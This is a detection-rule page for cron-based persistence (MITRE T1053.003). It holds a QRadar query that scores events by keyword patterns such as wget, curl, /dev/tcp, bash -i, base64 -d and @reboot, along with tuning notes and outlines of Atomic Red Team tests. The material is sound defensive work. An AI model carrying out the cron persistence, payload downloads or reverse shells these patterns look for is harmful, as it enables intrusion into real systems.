T1053.003 IBM QRadar · QRadar

Detect Cron in IBM QRadar

Adversaries may abuse the cron utility to perform task scheduling for initial or recurring execution of malicious code. The cron utility is a time-based job scheduler for Unix-like operating systems. The crontab file contains the schedule of cron entries to be run and the specified times for execution. Adversaries use cron in Linux, macOS, and ESXi environments to execute programs at system startup or on a scheduled basis for persistence, privilege escalation, or execution. Real-world malware families including Kinsing, Skidmap, GoldMax, NKAbuse, Rocke, and Anchor have all leveraged cron for persistence. In ESXi environments, cron jobs must be created directly via the crontab file (e.g., /var/spool/cron/crontabs/root).

MITRE ATT&CK

Tactic
Execution Persistence Privilege Escalation
Technique
T1053 Scheduled Task/Job
Sub-technique
T1053.003 Cron
Canonical reference
https://attack.mitre.org/techniques/T1053/003/

QRadar Detection Query

IBM QRadar (QRadar)
sql 
SELECT
  DATEFORMAT(starttime, 'YYYY-MM-dd HH:mm:ss') AS event_time,
  sourceip,
  username,
  hostname,
  "QIDNAME"(qid) AS event_name,
  CATEGORYNAME(category) AS category_name,
  payload,
  CASE
    WHEN payload ILIKE '%crontab%-%e%' OR payload ILIKE '%crontab%-%r%' THEN 1
    ELSE 0
  END +
  CASE
    WHEN payload ILIKE '%/etc/crontab%' OR payload ILIKE '%/var/spool/cron%'
      OR payload ILIKE '%/etc/cron.d%' OR payload ILIKE '%/var/cron/tabs%' THEN 1
    ELSE 0
  END +
  CASE
    WHEN payload ILIKE '%wget%' OR payload ILIKE '%curl%'
      OR payload ILIKE '%/dev/tcp%' OR payload ILIKE '%base64 -d%'
      OR payload ILIKE '%openssl enc%' THEN 1
    ELSE 0
  END +
  CASE
    WHEN payload ILIKE '%bash -i%' OR payload ILIKE '%python -c%'
      OR payload ILIKE '%perl -e%' OR payload ILIKE '%sh -c%' THEN 1
    ELSE 0
  END +
  CASE
    WHEN payload ILIKE '%/tmp/%' OR payload ILIKE '%/dev/shm/%'
      OR payload ILIKE '%/var/tmp/%' THEN 1
    ELSE 0
  END +
  CASE
    WHEN payload ILIKE '%chmod +x%' OR payload ILIKE '%chmod 777%'
      OR payload ILIKE '%chmod 755%' THEN 1
    ELSE 0
  END +
  CASE
    WHEN payload ILIKE '%@reboot%' THEN 1
    ELSE 0
  END AS suspicion_score,
  CASE
    WHEN (
      CASE WHEN payload ILIKE '%crontab%-%e%' OR payload ILIKE '%crontab%-%r%' THEN 1 ELSE 0 END +
      CASE WHEN payload ILIKE '%/etc/crontab%' OR payload ILIKE '%/var/spool/cron%' OR payload ILIKE '%/etc/cron.d%' THEN 1 ELSE 0 END +
      CASE WHEN payload ILIKE '%wget%' OR payload ILIKE '%curl%' OR payload ILIKE '%/dev/tcp%' OR payload ILIKE '%base64 -d%' THEN 1 ELSE 0 END +
      CASE WHEN payload ILIKE '%bash -i%' OR payload ILIKE '%python -c%' OR payload ILIKE '%perl -e%' THEN 1 ELSE 0 END +
      CASE WHEN payload ILIKE '%/tmp/%' OR payload ILIKE '%/dev/shm/%' THEN 1 ELSE 0 END +
      CASE WHEN payload ILIKE '%chmod +x%' OR payload ILIKE '%chmod 777%' THEN 1 ELSE 0 END +
      CASE WHEN payload ILIKE '%@reboot%' THEN 1 ELSE 0 END
    ) >= 4 THEN 'CRITICAL'
    WHEN (
      CASE WHEN payload ILIKE '%crontab%-%e%' THEN 1 ELSE 0 END +
      CASE WHEN payload ILIKE '%/etc/crontab%' OR payload ILIKE '%/var/spool/cron%' THEN 1 ELSE 0 END +
      CASE WHEN payload ILIKE '%wget%' OR payload ILIKE '%curl%' OR payload ILIKE '%/dev/tcp%' THEN 1 ELSE 0 END +
      CASE WHEN payload ILIKE '%bash -i%' OR payload ILIKE '%python -c%' THEN 1 ELSE 0 END +
      CASE WHEN payload ILIKE '%/tmp/%' OR payload ILIKE '%/dev/shm/%' THEN 1 ELSE 0 END +
      CASE WHEN payload ILIKE '%chmod +x%' THEN 1 ELSE 0 END +
      CASE WHEN payload ILIKE '%@reboot%' THEN 1 ELSE 0 END
    ) >= 3 THEN 'HIGH'
    WHEN (
      CASE WHEN payload ILIKE '%crontab%-%e%' THEN 1 ELSE 0 END +
      CASE WHEN payload ILIKE '%/etc/crontab%' OR payload ILIKE '%/var/spool/cron%' THEN 1 ELSE 0 END +
      CASE WHEN payload ILIKE '%wget%' OR payload ILIKE '%curl%' THEN 1 ELSE 0 END +
      CASE WHEN payload ILIKE '%bash -i%' THEN 1 ELSE 0 END +
      CASE WHEN payload ILIKE '%/tmp/%' THEN 1 ELSE 0 END
    ) >= 2 THEN 'MEDIUM'
    ELSE 'LOW'
  END AS risk_level
FROM events
WHERE
  LOGSOURCETYPENAME(devicetype) IN ('Linux OS', 'Universal DSM', 'Syslog')
  AND (
    payload ILIKE '%crontab%'
    OR payload ILIKE '%/etc/crontab%'
    OR payload ILIKE '%/var/spool/cron%'
    OR payload ILIKE '%/etc/cron.d%'
    OR payload ILIKE '%/etc/cron.daily%'
    OR payload ILIKE '%/etc/cron.hourly%'
    OR payload ILIKE '%/etc/cron.weekly%'
    OR payload ILIKE '%/etc/cron.monthly%'
    OR payload ILIKE '%/var/cron/tabs%'
  )
  AND starttime > NOW() - 86400 SECONDS
HAVING suspicion_score > 0
ORDER BY suspicion_score DESC, starttime DESC
LIMIT 500
high severity medium confidence

Detects T1053.003 cron abuse in QRadar by querying Linux/syslog event sources for cron-related file paths and commands, then scoring each event across seven suspicion dimensions: crontab edits, cron file writes, download tools, reverse shell commands, temp directory usage, chmod calls, and @reboot persistence. Produces risk levels from LOW to CRITICAL matching the SPL scoring logic.

Data Sources

QRadar SIEMLinux OS log sourceSyslog DSMUniversal DSM

Required Tables

events

False Positives & Tuning

  • Scheduled maintenance scripts installed by system administrators that write to /etc/cron.d/ during patch cycles
  • Monitoring agents (Datadog, New Relic, Splunk UF) that install cron jobs during initial deployment and may reference temp paths
  • CI/CD pipelines running on Linux build agents that use crontab to schedule build or cleanup jobs
Download portable Sigma rule (.yml)

Other platforms for T1053.003

Microsoft Sentinel (KQL) Splunk (SPL) Elastic Security (Elastic) Sumo Logic CSE (Sumo) Google Chronicle (YARA-L) CrowdStrike LogScale (LogScale) All platforms (combined) →

Testing Methodology

Validate this detection against 4 adversary techniques from Atomic Red Team. Each test below lists the behaviour to exercise and the telemetry you should expect to see. Executable commands and cleanup steps are available with Pro.

  1. Test 1Add Persistent Cron Job via crontab Command

    Expected signal: Auditd: syscall write/open on /var/spool/cron/crontabs/<username>. Syslog/cron log: CMD (/tmp/argus_test.sh) entries every minute. Process creation event for crontab command. File creation event for /tmp/argus_test.sh.

  2. Test 2Add @reboot Persistence Entry to Crontab

    Expected signal: Auditd: write to /var/spool/cron/crontabs/<username> with @reboot content. Syslog: crontab modification event. Process creation for crontab command. File creation for /tmp/argus_backdoor_test.sh with chmod +x.

  3. Test 3Direct Write to /etc/cron.d/ for System-Wide Persistence

    Expected signal: Auditd: file creation syscall on /etc/cron.d/argus-test-job. File creation event with initiating process bash/sudo. Syslog: within 5 minutes, CRON execution of curl command will appear in /var/log/cron or /var/log/syslog.

  4. Test 4Cron Job with Base64-Encoded Payload Download

    Expected signal: File creation event on /etc/cron.d/argus-encoded-test. Cron execution logs showing base64 and bash commands. If wget succeeds (requires listener), process creation for wget and the payload. Auditd syscall records for file write.

Last updated: 2026-04-17 Research depth: deep
References (13)

Unlock Pro Content

Get the full detection package for T1053.003 including response playbook, investigation guide, and atomic red team tests.

Response PlaybookInvestigation GuideHunting QueriesAtomic Red Team TestsTuning Guidance
Sign Up for Pro View Pricing

Related Detections

Parent Technique

T1053Scheduled Task/Job

Related Sub-techniques

T1053.002AtT1053.005Scheduled TaskT1053.006Systemd TimersT1053.007Container Orchestration Job

Related Techniques

T1053Scheduled Task/JobT1053.005Scheduled TaskT1059.004Unix ShellT1105Ingress Tool TransferT1496Resource HijackingT1070.004File DeletionT1027Obfuscated Files or InformationT1548.001Setuid and SetgidT1136.001Local AccountT1190Exploit Public-Facing Application

Same Tactic: Execution

Popular Detections